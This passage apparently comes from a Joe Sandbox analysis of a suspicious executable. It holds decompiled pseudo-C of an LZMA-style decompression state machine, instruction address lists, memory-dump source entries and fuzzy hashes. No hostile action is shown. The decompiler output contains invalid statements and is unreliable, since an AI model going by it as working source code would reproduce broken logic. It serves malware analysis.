                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xf;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t203 = __ebp - 0x70;
                    											 *_t203 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t203;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L60:
                    											__eflags = __ebx - 0x100;
                    											if(__ebx >= 0x100) {
                    												L55:
                    												__al =  *(__ebp - 0x44);
                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    												goto L56;
                    											}
                    											L61:
                    											__eax =  *(__ebp - 0x58);
                    											__edx = __ebx + __ebx;
                    											__ecx =  *(__ebp - 0x10);
                    											__esi = __edx + __eax;
                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                    											__ax =  *__esi;
                    											 *(__ebp - 0x54) = __esi;
                    											__edi = __ax & 0x0000ffff;
                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    											__eflags =  *(__ebp - 0xc) - __ecx;
                    											if( *(__ebp - 0xc) >= __ecx) {
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    												__cx = __ax;
                    												_t217 = __edx + 1; // 0x1
                    												__ebx = _t217;
                    												__cx = __ax >> 5;
                    												__eflags = __eax;
                    												 *__esi = __ax;
                    											} else {
                    												 *(__ebp - 0x10) = __ecx;
                    												0x800 = 0x800 - __edi;
                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    												__ebx = __ebx + __ebx;
                    												 *__esi = __cx;
                    											}
                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                    											 *(__ebp - 0x44) = __ebx;
                    											if( *(__ebp - 0x10) >= 0x1000000) {
                    												goto L60;
                    											} else {
                    												goto L58;
                    											}
                    										case 0x10:
                    											L110:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x10;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t366 = __ebp - 0x70;
                    											 *_t366 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t366;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											goto L112;
                    										case 0x11:
                    											L69:
                    											__esi =  *(__ebp - 0x58);
                    											 *(__ebp - 0x84) = 0x12;
                    											L132:
                    											 *(_t612 - 0x54) = _t605;
                    											goto L133;
                    										case 0x12:
                    											goto L0;
                    										case 0x13:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												_t469 = __ebp - 0x58;
                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                    												__eflags =  *_t469;
                    												 *(__ebp - 0x30) = 0x10;
                    												 *(__ebp - 0x40) = 8;
                    												goto L144;
                    											}
                    											__eax =  *(__ebp - 0x4c);
                    											__ecx =  *(__ebp - 0x58);
                    											__eax =  *(__ebp - 0x4c) << 4;
                    											 *(__ebp - 0x30) = 8;
                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                    											goto L130;
                    										case 0x14:
                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                    											__eax =  *(__ebp - 0x80);
                    											L140:
                    											 *(_t612 - 0x88) = _t533;
                    											goto L1;
                    										case 0x15:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    											__al = __al & 0x000000fd;
                    											__eax = (__eflags >= 0) - 1 + 0xb;
                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                    											goto L121;
                    										case 0x16:
                    											__eax =  *(__ebp - 0x30);
                    											__eflags = __eax - 4;
                    											if(__eax >= 4) {
                    												_push(3);
                    												_pop(__eax);
                    											}
                    											__ecx =  *(__ebp - 4);
                    											 *(__ebp - 0x40) = 6;
                    											__eax = __eax << 7;
                    											 *(__ebp - 0x7c) = 0x19;
                    											 *(__ebp - 0x58) = __eax;
                    											goto L145;
                    										case 0x17:
                    											goto L145;
                    										case 0x18:
                    											L146:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0x18;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t484 = __ebp - 0x70;
                    											 *_t484 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t484;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L148:
                    											_t487 = __ebp - 0x48;
                    											 *_t487 =  *(__ebp - 0x48) - 1;
                    											__eflags =  *_t487;
                    											goto L149;
                    										case 0x19:
                    											__eflags = __ebx - 4;
                    											if(__ebx < 4) {
                    												 *(__ebp - 0x2c) = __ebx;
                    												L120:
                    												_t394 = __ebp - 0x2c;
                    												 *_t394 =  *(__ebp - 0x2c) + 1;
                    												__eflags =  *_t394;
                    												L121:
                    												__eax =  *(__ebp - 0x2c);
                    												__eflags = __eax;
                    												if(__eax == 0) {
                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                    													goto L170;
                    												}
                    												__eflags = __eax -  *(__ebp - 0x60);
                    												if(__eax >  *(__ebp - 0x60)) {
                    													goto L171;
                    												}
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                    												__eax =  *(__ebp - 0x30);
                    												_t401 = __ebp - 0x60;
                    												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                    												__eflags =  *_t401;
                    												goto L124;
                    											}
                    											__ecx = __ebx;
                    											__eax = __ebx;
                    											__ecx = __ebx >> 1;
                    											__eax = __ebx & 0x00000001;
                    											__ecx = (__ebx >> 1) - 1;
                    											__al = __al | 0x00000002;
                    											__eax = (__ebx & 0x00000001) << __cl;
                    											__eflags = __ebx - 0xe;
                    											 *(__ebp - 0x2c) = __eax;
                    											if(__ebx >= 0xe) {
                    												__ebx = 0;
                    												 *(__ebp - 0x48) = __ecx;
                    												L103:
                    												__eflags =  *(__ebp - 0x48);
                    												if( *(__ebp - 0x48) <= 0) {
                    													__eax = __eax + __ebx;
                    													 *(__ebp - 0x40) = 4;
                    													 *(__ebp - 0x2c) = __eax;
                    													__eax =  *(__ebp - 4);
                    													__eax =  *(__ebp - 4) + 0x644;
                    													__eflags = __eax;
                    													L109:
                    													__ebx = 0;
                    													 *(__ebp - 0x58) = __eax;
                    													 *(__ebp - 0x50) = 1;
                    													 *(__ebp - 0x44) = 0;
                    													 *(__ebp - 0x48) = 0;
                    													L113:
                    													__eax =  *(__ebp - 0x40);
                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                    														_t392 = __ebp - 0x2c;
                    														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                    														__eflags =  *_t392;
                    														goto L120;
                    													}
                    													__eax =  *(__ebp - 0x50);
                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    													__eax =  *(__ebp - 0x58);
                    													__esi = __edi + __eax;
                    													 *(__ebp - 0x54) = __esi;
                    													__ax =  *__esi;
                    													__ecx = __ax & 0x0000ffff;
                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                    													__eflags =  *(__ebp - 0xc) - __edx;
                    													if( *(__ebp - 0xc) >= __edx) {
                    														__ecx = 0;
                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                    														__ecx = 1;
                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                    														__ebx = 1;
                    														__ecx =  *(__ebp - 0x48);
                    														__ebx = 1 << __cl;
                    														__ecx = 1 << __cl;
                    														__ebx =  *(__ebp - 0x44);
                    														__ebx =  *(__ebp - 0x44) | __ecx;
                    														__cx = __ax;
                    														__cx = __ax >> 5;
                    														__eax = __eax - __ecx;
                    														__edi = __edi + 1;
                    														__eflags = __edi;
                    														 *(__ebp - 0x44) = __ebx;
                    														 *__esi = __ax;
                    														 *(__ebp - 0x50) = __edi;
                    													} else {
                    														 *(__ebp - 0x10) = __edx;
                    														0x800 = 0x800 - __ecx;
                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L112:
                    														_t369 = __ebp - 0x48;
                    														 *_t369 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t369;
                    														goto L113;
                    													} else {
                    														goto L110;
                    													}
                    												}
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L102:
                    													_t339 = __ebp - 0x48;
                    													 *_t339 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t339;
                    													goto L103;
                    												} else {
                    													goto L100;
                    												}
                    											}
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L109;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L80;
                    										case 0x1b:
                    											L76:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t275 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t275;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t284 = __ebp - 0x64;
                    											 *_t284 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t284;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L80:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L81;
                    										case 0x1c:
                    											while(1) {
                    												L124:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t415 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t415;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t415;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L81:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											 *(__ebp - 0x88) = 0x1c;
                    											L170:
                    											_push(0x22);
                    											_pop(_t567);
                    											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                    											_t535 = 0;
                    											L172:
                    											return _t535;
                    									}
                    								}
                    								L171:
                    								_t535 = _t534 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    						__eax =  *(__ebp - 0x50);
                    						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                    						__eax =  *(__ebp - 0x58);
                    						__esi = __edx + __eax;
                    						 *(__ebp - 0x54) = __esi;
                    						__ax =  *__esi;
                    						__edi = __ax & 0x0000ffff;
                    						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    						if( *(__ebp - 0xc) >= __ecx) {
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    							__cx = __ax;
                    							__cx = __ax >> 5;
                    							__eax = __eax - __ecx;
                    							__edx = __edx + 1;
                    							 *__esi = __ax;
                    							 *(__ebp - 0x50) = __edx;
                    						} else {
                    							 *(__ebp - 0x10) = __ecx;
                    							0x800 = 0x800 - __edi;
                    							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    							 *__esi = __cx;
                    						}
                    						if( *(__ebp - 0x10) >= 0x1000000) {
                    							goto L148;
                    						} else {
                    							goto L146;
                    						}
                    					}
                    					goto L1;
                    				}
                    			}








                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00000000
                    0x00407482
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x00000000
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075e5
                    0x004075eb
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00407524
                    0x00000000
                    0x00407399

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E004070AB() {
                    				unsigned short _t532;
                    				signed int _t533;
                    				void _t534;
